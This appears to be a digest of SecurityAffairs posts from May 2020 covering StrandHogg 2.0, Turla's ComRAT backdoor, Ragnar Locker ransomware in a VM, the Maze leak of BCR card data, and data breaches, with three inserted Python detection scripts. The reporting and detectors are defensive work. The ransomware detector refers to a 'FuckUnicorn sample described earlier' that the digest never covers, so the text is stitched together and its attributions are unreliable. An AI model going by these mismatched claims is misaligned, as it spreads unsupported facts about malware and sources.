The permissions granted to the app could allow spying on the user by accessing the camera and microphone, obtaining the device’s location, reading the SMSs, capturing login credentials (including 2FA codes via SMS), accessing private photos and videos, accessing contacts and call logs, and also making calls and recording the victim’s conversations.

The same team of Norwegian researchers that discovered StrandHogg reported the CVE-2020-0096 flaw and named it StrandHogg 2.0. The vulnerability affects all Android devices except those running Android Q/10, which means that 80%-85% of Android devices are exposed.

The StrandHogg 2.0 flaw is an elevation of privilege issue that allows attackers to gain access to almost all apps installed on a device.

While StrandHogg 1.0 could be used to attack apps only one at a time, StrandHogg 2.0 allows attackers to “dynamically attack nearly any app on a given device simultaneously at the touch of a button,” without requiring a pre-configuration for each targeted app.

“If the victim then inputs their login credentials within this interface, those sensitive details are immediately sent to the attacker, who can then login to, and control, security-sensitive apps,” Promon says.

“Utilizing StrandHogg 2.0, attackers can, once a malicious app is installed on the device, gain access to private SMS messages and photos, steal victims’ login credentials, track GPS movements, make and/or record phone conversations, and spy through a phone’s camera and microphone.”


Targeted users cannot spot the StrandHogg attack, which can be exploited without root access and works on all versions of Android.

The new flaw can be used for various types of phishing attack, such as displaying a fake login screen, gathering different types of sensitive information, denial of service, and/or collecting permissions under the guise of the target app (such as SMS, GPS positioning and more).

Experts reported the flaw to Google in December; the tech giant released a security patch to device manufacturers in April 2020, and they are going to release security updates for their devices.

The experts also released a PoC video demonstrating the attack.

Pierluigi Paganini

(SecurityAffairs – StrandHogg 2.0 , hacking)

New Turla ComRAT backdoor uses Gmail for Command and Control

Researchers uncovered a new advanced variant of Turla’s ComRAT backdoor that leverages Gmail’s web interface as C2 infrastructure.

Cybersecurity researchers discovered a new version of the ComRAT backdoor, also known as Agent.BTZ, which is a malware that was employed in past campaigns attributed to the Turla APT group.

Earlier versions of Agent.BTZ were used to compromise US military networks in the Middle East in 2008.

The new variant leverages Gmail’s web interface to covertly receive commands and exfiltrate sensitive data.

ComRAT v4 appeared in the threat landscape in 2017 and is still used by threat actors; recently a new variant was used in attacks against two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.


This new version was developed from scratch and is far more complex than its predecessors. 

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

ComRAT is a sophisticated backdoor developed in C++ that can perform many malicious actions on infected systems, such as executing additional payloads or exfiltrating files.

The backdoor uses a virtual file system formatted in FAT16, and it is deployed using existing access methods, including the PowerStallion PowerShell backdoor.

ComRAT leverages the following C2 channels:

  • HTTP: It uses exactly the same protocol as ComRAT v3
  • Email: It uses the Gmail web interface to receive commands and exfiltrate data

The main components of ComRAT v4 are:

  • an orchestrator, which is injected into explorer.exe process and is used to control most of ComRAT functions.
  • a communication module (a DLL), which is injected into the default browser by the orchestrator. It communicates with the orchestrator using a named pipe.
  • a Virtual FAT16 File System, containing the configuration and the logs files.

“The main use of ComRAT is discovering, stealing and exfiltrating confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents.” reads the report published by the experts.

To evade detection, ComRAT files, with the exception of the orchestrator DLL and the scheduled task for persistence, are stored in a virtual file system (VFS). The default VFS container file is hardcoded in the orchestrator component, which drops it the first time it is executed.

The C&C “mail” mode was specific to the Gmail email provider.

The orchestrator reads the operator’s email address from /etc/transport/mail/mailboxes/0/command_addr and the cookies used to authenticate to Gmail from /etc/transport/mail/mailboxes/0/cookie, then parses the inbox HTML page using the Gumbo HTML parser. The cookies have a limited lifetime, so they must be refreshed at each interaction.

The Gmail parser retrieves the list of emails whose subject lines match those in a “subject.str” file in the VFS.

The ComRAT backdoor downloads the attachments (e.g. “document.docx,” “documents.xlsx”) from each email that meets the above criteria, then deletes the emails to avoid processing them twice.

Despite their extensions, the attachments are not Office documents, but rather encrypted blobs of data that include a specific command to be executed.

The backdoor creates an attachment containing the result of the commands; its name consists of 20 random digits followed by the so-called double extension .jpg.bfe.

The analysis of the time of day that commands were sent in a one-month period reveals that the operators are working in the UTC+3 or UTC+4 time zone.

“Version four of ComRAT is a totally revamped malware family released in 2017,” ESET concludes. “Its most interesting features are the Virtual File System in FAT16 format and the ability to use the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to bypass some security controls because it doesn’t rely on any malicious domain.”
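Two of the details above are directly usable as detection logic: the result attachments named with 20 digits and the .jpg.bfe double extension, and the downloaded “Office” attachments whose bytes are encrypted blobs rather than Office containers. The following Python script is an added example, not code from the original post or from ESET: it applies both checks to constructed attachment records of the kind a mail or web proxy could extract from a Gmail session (the record fields and the sample bytes are assumptions; only the first 16 bytes of each attachment are kept).

```python
"""Flag attachments that match the ComRAT v4 Gmail channel described above.

Added example, not code from the original post or from ESET: the records are
constructed; the field names (direction, filename, head) are assumptions about
what a mail/web proxy could log from a Gmail session.
"""
import re

# Result attachment names: exactly 20 digits followed by the .jpg.bfe double extension.
EXFIL_NAME = re.compile(r"^\d{20}\.jpg\.bfe$")

# Modern Office files are ZIP containers (OOXML); legacy ones are OLE2 compound files.
OOXML_EXTS = {".docx", ".xlsx", ".pptx"}
OLE2_EXTS = {".doc", ".xls", ".ppt"}
ZIP_MAGIC = b"PK\x03\x04"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def _ext(filename):
    base = filename.rsplit("/", 1)[-1]
    return ("." + base.rsplit(".", 1)[-1].lower()) if "." in base else ""


def office_extension_mismatch(filename, head):
    """True when the name claims an Office document but the leading bytes do not."""
    ext = _ext(filename)
    if ext in OOXML_EXTS:
        return not head.startswith(ZIP_MAGIC)
    if ext in OLE2_EXTS:
        return not head.startswith(OLE2_MAGIC)
    return False


def classify(record):
    """Return the reasons (possibly none) this attachment record looks like ComRAT traffic."""
    reasons = []
    name = record["filename"]
    if record["direction"] == "download" and office_extension_mismatch(name, record["head"]):
        reasons.append("office-name-but-not-office-bytes")
    if record["direction"] == "upload" and EXFIL_NAME.match(name):
        reasons.append("20-digit-jpg-bfe-upload")
    return reasons


def scan(records):
    hits = []
    for rec in records:
        reasons = classify(rec)
        if reasons:
            hits.append((rec["filename"], reasons))
    return hits


# Constructed sample records (first 16 bytes of each attachment).
SAMPLE_RECORDS = [
    {"direction": "download", "filename": "document.docx",            # encrypted blob
     "head": b"\x8f\x1a\x22\xc0\x55\x9e\x01\xb3\x77\x40\x6d\xe2\x19\xaa\x03\xf4"},
    {"direction": "download", "filename": "quarterly.docx",           # genuine OOXML
     "head": b"PK\x03\x04\x14\x00\x06\x00\x08\x00\x00\x00!\x00\x00\x00"},
    {"direction": "download", "filename": "documents.xlsx",           # encrypted blob
     "head": b"\x4c\x3b\x99\x10\xe7\x02\xcd\x58\x81\x1f\x36\xac\x73\x9d\x00\x2a"},
    {"direction": "upload", "filename": "48213976501128843057.jpg.bfe",  # command result
     "head": b"\x00" * 16},
    {"direction": "upload", "filename": "holiday.jpg",                # genuine JPEG
     "head": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01"},
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_RECORDS):
        print(name, "->", ", ".join(reasons))
```

The magic-byte check is the more durable of the two, because the attacker controls the names but cannot make an encrypted blob start with a ZIP or OLE2 header without changing how the implant parses it; the name regex is cheap but tied to this specific version.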

Pierluigi Paganini

(SecurityAffairs – Turla, hacking)

Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

Hangzhou, one of the major tech hubs in China, is planning to permanently use the tracking system developed to fight the COVID-19 outbreak.

The city’s health commission declared that the permanent version of the contact tracing system would be a “‘firewall’ to enhance people’s health and immunity” after the COVID-19 pandemic.

The contact tracing app was developed by Tencent and Alibaba and is mandatory; it implements a “triage” system based on the travel history of the citizen.

The app is currently mandatory and assigns users a green, yellow, or red status. Residents who visited COVID-19 hot spots or were in contact with infected individuals are given a red code and asked to quarantine for 14 days. Residents in good health who had no contact with infected individuals are given a green code and can move around the city without any restriction.


The app is already used by one billion people and the codes it generates have been scanned more than nine billion times.

“According to Qiu Yuepeng, vice president of Tencent and President of Tencent Cloud, since the official version of the health code was launched on February 9, Tencent’s health code has covered more than 20 provinces and more than 400 cities and counties in the country, covering more than 1 billion people.” reads the post published by Tencent. “The total number of visits exceeded 26 billion, and the cumulative number of code visits exceeded 9 billion.”

Hangzhou’s Health Commission aims to permanently use a system that would assign users a health score ranging from 0 to 100 based on different factors, such as their medical records, physical examinations, and habits (e.g. the steps they walk, the hours they sleep, or how much they exercise daily).

Privacy advocates clearly fear that the contact tracing system could extend the dragnet surveillance implemented by the Chinese government to monitor its citizens.

Facial recognition technology is widely adopted in China, where the government already uses the social credit system to monitor citizens’ online behaviour and assign a “citizen score.”

Pierluigi Paganini

(SecurityAffairs – COVID-19, contact tracing system)

Bugs in open-source libraries impact 70% of modern software

70 percent of the mobile and desktop applications we use today are affected by at least one security flaw that is present in an open-source library.

According to the Veracode’s annual State of Software Security report, 70 percent of mobile and desktop applications being used today have at least one security flaw that is the result of the use of an open-source library.

Experts pointed out that every library could be affected by one or more issues that are inherited by all the applications that use it.

According to Veracode’s annual State of Software Security report, almost any modern application includes open source libraries that implement functionality that would be extremely tedious to write from scratch.

The experts analyzed over 85,000 applications and related imported libraries, accounting for over 351,000 unique external libraries.

“The number of external libraries found in any given application varies quite a bit depending on the language in which the application is being developed.” reads the report.

The use of open-source libraries is quite common, for example most JavaScript applications contain hundreds of libraries.

“Our research found that most JavaScript applications contain hundreds of open source libraries – some have over 1,000 different libraries. In addition, most languages feature the same set of core libraries.” reads the post published by Veracode. “JavaScript and PHP in particular have several core libraries that are in just about every application.”

Most of the vulnerabilities affecting the applications analyzed by the researchers were present in the Swift, .NET, Go, and PHP open-source libraries.

“But not all flaws are equal. Some security issues are relatively exotic or difficult to exploit while others may be much more significant to their application. It’s this sorting of the zebras from the horses to which we now turn.” continues the report.

Swift, which is widely used in the Apple ecosystem, has the highest density of vulnerabilities, but an overall low percentage of flawed libraries.

.NET has the lowest percentage of flawed libraries on a population that is more than 17 times larger than Swift.

Go has a high percentage of libraries with flaws; the good news is that it has an overall low number of flaws per individual library. Compared with Go, PHP has a higher rate of flawed libraries and more than double the density of flaws in a given library.


Cross-site scripting (XSS) is the most common vulnerability affecting open-source libraries; it is present in 30 percent of them. Other major issues are insecure deserialization (23.5 percent) and broken access control (20.3 percent). Insecure deserialization is a rare flaw among in-house applications.

“The report found that 70 percent of applications have a security flaw in an open source library on initial scan. Cross-Site Scripting is the most common vulnerability category found in open source libraries – present in 30 percent of libraries – followed by insecure deserialization (23.5 percent) and broken access control (20.3 percent).” continues the post.

Experts pointed out that addressing security vulnerabilities in open-source libraries is not so difficult.

“In the good news department, addressing the security flaws in these libraries is most often not a significant job. Most library-introduced flaws (nearly 75 percent) in applications can be addressed with only a minor version update. Major library upgrades are not usually required!” concludes the report.

“This data point suggests that this problem is one of discovery and tracking, not huge refactoring of code.”
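The remediation point above, that most library-introduced flaws are cleared by a minor or patch bump, is something worth computing for one's own manifest rather than taking from a report. The following Python script is an added example, not Veracode’s code or data: for a constructed manifest and advisory list with placeholder library names, it classifies each fix as a patch, minor or major upgrade under semantic versioning and summarizes the share that needs no major upgrade. It simplifies real advisories, which carry version ranges rather than the single fixed_in value assumed here.

```python
"""Classify the dependency bump needed to clear each library-introduced flaw.

Added example, not code from the original post or from Veracode: the manifest
and advisories are constructed with placeholder names and ids, and each advisory
is reduced to a single fixed_in version (real advisories carry version ranges).
"""
from collections import Counter


def parse_version(text):
    """Turn '1.4.2' (optionally with a '-pre' or '+build' suffix) into (major, minor, patch)."""
    core = text.split("-", 1)[0].split("+", 1)[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def bump_kind(installed, fixed_in):
    """'none' if already at or past the fix, else the smallest semver bump that reaches it."""
    cur, fix = parse_version(installed), parse_version(fixed_in)
    if cur >= fix:
        return "none"
    if cur[0] != fix[0]:
        return "major"
    if cur[1] != fix[1]:
        return "minor"
    return "patch"


def plan_upgrades(manifest, advisories):
    """One row per advisory that names an installed library."""
    rows = []
    for adv in advisories:
        installed = manifest.get(adv["library"])
        if installed is None:
            continue  # advisory for a library this application does not import
        rows.append({"library": adv["library"], "advisory": adv["id"],
                     "installed": installed, "fixed_in": adv["fixed_in"],
                     "bump": bump_kind(installed, adv["fixed_in"])})
    return rows


def summarize(rows):
    """Counts per bump kind (excluding already-fixed) and the share cleared without a major bump."""
    counts = Counter(r["bump"] for r in rows if r["bump"] != "none")
    total = sum(counts.values())
    easy = counts["patch"] + counts["minor"]
    return {"counts": dict(counts), "minor_or_patch_share": (easy / total) if total else 0.0}


# Constructed sample data: placeholder library names, versions and advisory ids.
MANIFEST = {"example-lib-a": "1.4.2", "example-lib-b": "2.1.0",
            "example-lib-c": "1.9.0", "example-lib-d": "3.2.1"}
ADVISORIES = [
    {"library": "example-lib-a", "id": "ADV-PLACEHOLDER-1", "fixed_in": "1.4.3"},  # patch
    {"library": "example-lib-b", "id": "ADV-PLACEHOLDER-2", "fixed_in": "2.3.0"},  # minor
    {"library": "example-lib-c", "id": "ADV-PLACEHOLDER-3", "fixed_in": "2.0.0"},  # major
    {"library": "example-lib-d", "id": "ADV-PLACEHOLDER-4", "fixed_in": "3.2.0"},  # already fixed
    {"library": "example-lib-e", "id": "ADV-PLACEHOLDER-5", "fixed_in": "0.9.1"},  # not installed
]

if __name__ == "__main__":
    rows = plan_upgrades(MANIFEST, ADVISORIES)
    for r in rows:
        print(f'{r["library"]:14} {r["installed"]:>7} -> {r["fixed_in"]:<7} {r["bump"]}')
    print(summarize(rows))
```

The useful output is the `major` rows: those are the only upgrades that plausibly need refactoring, while everything else is the discovery-and-tracking problem the report describes.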

Pierluigi Paganini

(SecurityAffairs – open-source libraries flaws, hacking)

Cisco fixed a critical issue in the Unified Contact Center Express

Cisco has released several security patches, including one for a critical issue, tracked as CVE-2020-3280, in the call-center software Unified Contact Center Express.

Cisco released a set of security patches, including one for a critical flaw in its call-center software Unified Contact Center Express, tracked as CVE-2020-3280.

The CVE-2020-3280 vulnerability is a remote code execution issue that resides in the Java remote management interface for Unified CCE.

“A vulnerability in the Java Remote Management Interface of Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system.”

An unauthenticated, remote attacker could exploit the issue to execute arbitrary code as the root user on a vulnerable device.

The issue could be exploited by supplying a malformed serialized Java object to a specific listener on a vulnerable system.

Administrators should update their Unified CCE installs as soon as possible.

The good news is that Cisco is not aware of attacks in the wild that exploited the flaw.

Pierluigi Paganini

(SecurityAffairs – Unified CCE, hacking)

Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid

Threat actors are offering for sale more than two dozen SQL databases belonging to e-commerce websites for different countries.

Hackers are offering for sale more than two dozen SQL databases stolen from online shops from multiple countries.

Threat actors compromised insecure servers exposed online and, after copying the content of their websites, left a ransom note.

Some of the databases date back to 2016, but the data starts from March 28, 2020.

The crooks demand BTC 0.06 ($485 at the current price) and threaten to leak the content of the database if the victims don’t pay the ransom within 10 days.

The ransom notes observed in this campaign include a couple of wallets that received more than 100 transactions for a total of BTC 5.8 ($47,150 at current price).

“The number of abuse reports for these two wallets is over 200, the oldest being from September 20, 2019. The most recent one is from May 20 and this month alone there were nine reports, indicating that the actor is highly active.” reported BleepingComputer.

“It is important to note that the hacker may use more than the wallets found by BleepingComputer.”

The seller is offering 31 databases and gives a sample for the buyers to check the authenticity of the data.

Most of the listed databases are from online stores in Germany; the other e-stores hacked by the threat actors are from Brazil, the U.S., Italy, India, Spain, and Belarus.

The hacked stores were running Shopware, JTL-Shop, PrestaShop, OpenCart, Magento v1 and v2 e-commerce CMSs.

The databases contain a total of 1,620,000 rows; the exposed records include email addresses, names, hashed passwords (e.g. bcrypt, MD5), postal addresses, gender, and dates of birth.

It isn’t the first time that crooks have targeted unprotected databases; experts have observed several attacks against unprotected MongoDB installs.

Pierluigi Paganini

(SecurityAffairs – SQL databases, hacking)

Ragnar Ransomware encrypts files from virtual machines to evade detection

Ransomware encrypts from virtual machines to evade antivirus

Ragnar Locker deploys Windows XP virtual machines to encrypt victims’ files; the trick allows it to evade detection by security software.

Crooks always devise new techniques to evade detection: Ragnar Locker is deploying Windows XP virtual machines to encrypt victims’ files while bypassing security measures.

Ragnar Locker appeared relatively recently in the threat landscape; at the end of 2019 it was employed in attacks against corporate networks.

One of the victims of the ransomware is the energy giant Energias de Portugal (EDP), where the attackers claimed to have stolen 10 TB of files.

While many ransomware infections terminate security programs before encrypting, this sample of Ragnar Locker terminates both security programs and managed service provider (MSP) utilities to prevent them from blocking the attack.

“A new ransomware attack method takes defense evasion to a new level—deploying as a full virtual machine on each targeted device to hide the ransomware from view. In a recently detected attack, Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine.” reads the report published by Sophos. “The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.”

The attack chain starts with the creation of a tool folder that includes VirtualBox, a mini Windows XP virtual disk called micro.vdi, which is an image of a stripped-down version of the Windows XP SP3 OS (MicroXP v0.82). The image includes the 49 kB Ragnar Locker ransomware executable, the attack also includes several executables and scripts to prep the environment.


The malware leverages a VirtualBox feature that allows the host operating system to share folders and drives as a network share inside a virtual machine. The virtual machine mounts each shared path as a network drive from the \\VBOXSVR virtual computer to access its content.

“In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script.” continues the analysis. “The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.”

The install.bat batch file scans for local drives and mapped network drives on the host and builds a configuration file that automatically shares them with the virtual machine.

The script also prepares an sf.txt file containing VirtualBox configuration settings to automatically share all of the drives on the computer with the virtual machine.

The attackers then launch the Windows XP virtual machine with the SharedFolder directives created by their batch file, so that all of these shared drives are accessible from within the virtual machine. Experts pointed out that the Ragnar Locker ransomware executable is automatically present in the root of the virtual machine’s C:\ drive.

Windows XP virtual machine (Source: Sophos)

Also included is a vrun.bat file that is located in the Startup folder so that it is launched immediately when the virtual machine starts.

This vrun.bat file mounts each shared drive, encrypts it, and then proceeds to the next drive shared with the virtual machine.

Mounting all the shared drives to encrypt

As the security software running on the victim’s host will not detect the ransomware executable or activity on the virtual machine, it will happily keep running without detecting that the victim’s files are now being encrypted.

It should be noted that if the victim was running Windows 10’s Controlled Folder Access anti-ransomware feature, it may have been protected from an attack like this as the operating system would have detected writes to the protected folders.

When done, the victim will find a custom ransom note on their computer explaining how their company was breached, and their files were encrypted.

Custom Ragnar Locker ransom note (Source: Sophos)

The use of a virtual machine to encrypt a device’s files without being detected is an innovative approach.

As VirtualBox and a Windows XP virtual machine are not considered malicious, most security software will not be concerned that it is blissfully writing to all the data on the computer.

This attack illustrates how security software with behavioral monitoring is becoming more important to stem the tide of ransomware infections.

Only by detecting the unusual mass file writes would this attack be caught.
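The mass-write behaviour is the signal that survives both the Ragnar Locker trick above and simpler ransomware such as the FuckUnicorn sample described earlier, which reveals itself by appending the same new extension to file after file. The following Python script is an added example, not code from the original post, from Sophos or from CERT-AgID: it runs two behavioral rules over a constructed file-event stream, a sliding-window count of writes per process and a count of distinct files a process has renamed to the same new extension. The host process name for the VirtualBox guest and the fake app’s executable name are assumptions; the \\VBOXSVR share and the .fuckunicornhtrhrtjrjy extension come from the articles above.

```python
"""Behavioral ransomware detection: mass file writes and bursts of extension renames.

Added example, not code from the original post, from Sophos or from CERT-AgID.
The event stream is constructed; "VBoxHeadless.exe" (assumed host-side process
of the VirtualBox guest) and "immuni_beta.exe" (assumed name of the fake app)
are placeholders. Note that the host sees the VM's writes on host paths: the
\\VBOXSVR share name only exists inside the guest.
"""
from collections import defaultdict, deque

WRITE_THRESHOLD = 50      # files modified by one process inside WINDOW_SECONDS
WINDOW_SECONDS = 10.0
RENAME_THRESHOLD = 5      # distinct files renamed by one process to the same new extension


def _ext(path):
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""


def detect(events, write_threshold=WRITE_THRESHOLD, window=WINDOW_SECONDS,
           rename_threshold=RENAME_THRESHOLD):
    """events: iterable of (timestamp, process, op, path, new_path); op is 'write' or 'rename'.

    Returns one alert per (rule, process) the first time the rule fires.
    """
    alerts = []
    recent_writes = defaultdict(deque)                  # process -> write timestamps in window
    renamed_to = defaultdict(lambda: defaultdict(set))  # process -> new ext -> renamed paths
    raised = set()

    def raise_once(kind, proc, detail):
        if (kind, proc) not in raised:
            raised.add((kind, proc))
            alerts.append({"kind": kind, "process": proc, "detail": detail})

    for ts, proc, op, path, new_path in sorted(events, key=lambda e: e[0]):
        if op == "write":
            q = recent_writes[proc]
            q.append(ts)
            while ts - q[0] > window:        # drop writes that fell out of the window
                q.popleft()
            if len(q) >= write_threshold:
                raise_once("mass-write", proc, f"{len(q)} writes in {window:.0f}s, last: {path}")
        elif op == "rename" and new_path:
            old_ext, new_ext = _ext(path), _ext(new_path)
            if new_ext and new_ext != old_ext:
                paths = renamed_to[proc][new_ext]
                paths.add(new_path)
                if len(paths) >= rename_threshold:
                    raise_once("rename-burst", proc, f"{len(paths)} files renamed to {new_ext}")
    return alerts


def build_sample_events():
    """Constructed event stream: one VM-driven encryptor, one benign user, one extension appender."""
    events = []
    # 1) The VirtualBox process on the host writing to every document it reached via the
    #    shared folder (inside the guest the same files appear under \\VBOXSVR).
    for i in range(60):
        events.append((100.0 + i * 0.1, "VBoxHeadless.exe", "write",
                       f"C:\\Users\\victim\\Documents\\report{i}.docx", None))
    # 2) Normal activity: a handful of saves from the shell, interleaved in time.
    for i in range(3):
        events.append((105.0 + i, "explorer.exe", "write",
                       f"C:\\Users\\victim\\Desktop\\notes{i}.txt", None))
    # 3) A fake contact-tracing app appending the FuckUnicorn extension to each file.
    for i in range(6):
        old = f"C:\\Users\\victim\\Pictures\\holiday{i}.jpg"
        events.append((200.0 + i * 0.5, "immuni_beta.exe", "rename", old,
                       old + ".fuckunicornhtrhrtjrjy"))
    return events


if __name__ == "__main__":
    for alert in detect(build_sample_events()):
        print(alert["kind"], alert["process"], alert["detail"])
```

The write rule keys on the process that touches the files, which on the host is the VirtualBox process rather than the ransomware binary, so it fires regardless of how the payload is hidden; Windows 10’s Controlled Folder Access mentioned above makes a related decision, but on the basis of an allow-list of processes rather than a rate.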

Pierluigi Paganini

(SecurityAffairs – Ragnar Locker ransomware, hacking)

Maze ransomware operators leak credit card data from Costa Rica’s BCR bank

Maze ransomware operators published credit card details stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Maze ransomware operators have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Early May, Maze Ransomware operators claimed to have hacked the network of the state-owned Bank of Costa Rica Banco BCR and to have stolen internal data, including 11 million credit card credentials.

Banco BCR has equity of $806,606,710 and assets of $7,607,483,881, it is one of the most solid banks in Central America.

The hackers claim to have compromised Banco BCR’s network in August 2019 and to have had the opportunity to exfiltrate its information before encrypting the files.


According to Maze, the bank’s network remained unsecured at least since February 2020.

However, the group explained that it did not encrypt the bank documents in February because it “was at least incorrect during the world pandemic”.

The stolen data includes 4 million unique credit card records, 140,000 of which allegedly belong to US citizens.

Now the Maze ransomware operators published a post on their leak site along with a spreadsheet (2GB in size) containing the payment card numbers from customers of Banco de Costa Rica (BCR).


The threat actors decided to leak the credit card numbers because of the lack of security measures implemented by the bank.

Security firm Cyble confirmed the data leak, which consists of over 2GB of data.

“Just like previously, the Cyble Research Team has verified the data leak, which consists of a 2GB CSV file containing details of various Mastercard and Visa credit cards or debit cards.” reads the post published by Cyble. “As per Cyble’s researchers, the Maze ransomware operators have made this data leak due to the Banco de Costa not taking the previous leaks seriously. Along with that, the Maze ransomware operators have threatened the BCR about this type of leak going to happen every week.”

Maze ransomware operators published screenshots showing unencrypted Visa or MasterCard credit card numbers, all the cards have been issued by BCR.

The BCR bank always denied that its systems have been hacked by the Maze gang.

“After multiple analyzes carried out by internal and external specialists in computer security, no evidence has been found to confirm that our systems have been violated. The permanent monitoring of our clients’ transactions confirms that none has been affected.” reads the last statement published by the bank.

Pierluigi Paganini

(SecurityAffairs – BCR, hacking)

3 hacking forums have been hacked and database have been leaked online

Three hacking forums Nulled.ch, Sinfulsite.com, and suxx.to have been hacked and their databases have been leaked online

Researchers from intelligence firm Cyble made the headlines again: this time they discovered online the databases of three hacking forums, Sinful Site, SUXX.TO and Nulled, which were all hacked.

These cybercrime forums are gathering places for hackers and cybercriminals, who use them to take part in general discussions and share related resources.


Members of the forums share and sell data leaks, hacking tools, malware, tutorials, and much more. The databases appear to have been leaked in May 2020.

“Recently, the Cyble Research Team obtained the database leaks of these hacking forums which appear to have been leaking in May 2020. The Cyble’s researchers obtained:

  • The databases of SUXX.TO and Nulled contain detailed information of their users, which appears to be dumped on 20 May 2020.
  • The full database of Sinful Site including the private messages, which appear to be dumped on 15 May 2020.”

reads the post published by security firm Cyble.

Cyble experts said that all the above databases have been indexed in the AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – data breach, cyber crime forums)


25 million Mathway user records available for sale on the dark web

A threat actor is offering for sale on a dark web marketplace a database containing 25 million user records belonging to Mathway.

A data breach broker, known as Shiny Hunters, is offering for sale on a dark web marketplace a database that contains 25 million user records for Mathway.

In early May, Shiny Hunters attempted to sell on a dark web marketplace databases containing more than 73.2 million user records from 11 different companies.

Shiny Hunters started by offering the Tokopedia dump, then went on to offer 22 million user records from Unacademy and data allegedly obtained from the hack of Microsoft’s GitHub account.

Recently the group has begun selling databases for the meal kit and food delivery company HomeChef, the photo print service ChatBooks, and Chronicle.com.

Mathway is a free math problem solver covering everything from basic algebra to complex calculus: it instantly solves users’ math problems when they type them in (or point their camera and snap a picture). Users receive instant free answers through the website or the mobile apps (both iOS and Android).

The Mathway app has over 10 million installs across the Google Play Store and the Apple App Store.

The dump was discovered by cyber intelligence firm Cyble, which confirmed that the archive was being sold in private sales in underground markets.

The Shiny Hunters group is offering for sale the Mathway database for $4,000.

Users’ records in the dump include email addresses and hashed passwords.

“We are aware of reports of a potential data compromise.  We are working with cybersecurity experts to investigate further, and will take the appropriate steps to ensure the security of customer information.” reads a statement published by Mathway.

Mathway is currently investigating the security breach; in the meantime, its users should change their password on the site and on any other site where they used the same credentials.

Mathway users can check whether their account was impacted by the data breach by querying Cyble’s AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – Mathway, hacking)


Unc0ver is the first jailbreak that works on all recent iOS versions since 2014

A team of hackers and cyber-security researchers have released a new jailbreak package dubbed Unc0ver for iOS devices.

A team of cyber-security researchers and hackers have released a new jailbreak package dubbed Unc0ver (from the name of the team that devised it) that works on all recent iOS devices, even those running the current iOS 13.5 release.

Jailbreaking an iOS mobile device removes the restrictions imposed by Apple’s operating system: it gives users root access to the iOS file system and package manager, which allows them to download and install applications and themes from third-party stores.

By default, Apple does not allow users to have full control over their iPhones and other iOS devices, citing security reasons.

The Unc0ver team today released Unc0ver 5.0.0, the latest version of their jailbreak, which can root and unlock all iOS devices, even those running the latest iOS v13.5.

The jailbreak exploits a zero-day vulnerability in the iOS operating system that was discovered by Pwn20wnd, a member of the Unc0ver team, and that has yet to be addressed by Apple.

Pwn20wnd states that #unc0ver v5.0.0 will be a big milestone for jailbreaking because it is the first zero-day jailbreak released since iOS 8 that was released in September 2014.

Other jailbreak applications released since iOS 9 used 1-day exploits and did not work on the current iOS version.

The new Unc0ver 5.0.0 jailbreak can be used from iOS, macOS, Linux, and Windows devices.

The Unc0ver team published instructions on their website.

“unc0ver is designed to be stable and enable freedom from the moment you jail​break your device. Built-in runtime policy softener allows running code without Apple’s notarization and pervasive restrictions.” reads the website.

“unc0ver Team strongly cautions against installing any iOS software update that breaks unc0ver as you can’t re-jail​break on versions of iOS that are not supported by unc0ver at that time.”

The Unc0ver team tested the jailbreak on iOS 11 through iOS 13.5; the software did not work on iOS versions 12.3 to 12.3.2 and 12.4.2 to 12.4.5.

What makes this jailbreak outstanding is that according to Pwn20wnd it doesn’t impact Apple’s iOS security features.

Let’s see when Apple will release security updates to address the zero-day vulnerability exploited by the Unc0ver team.

Pierluigi Paganini

(SecurityAffairs – Unc0ver, jailbreak)


Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below is a list of the attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID-19-themed attacks from February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)


Security Affairs newsletter Round 265

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

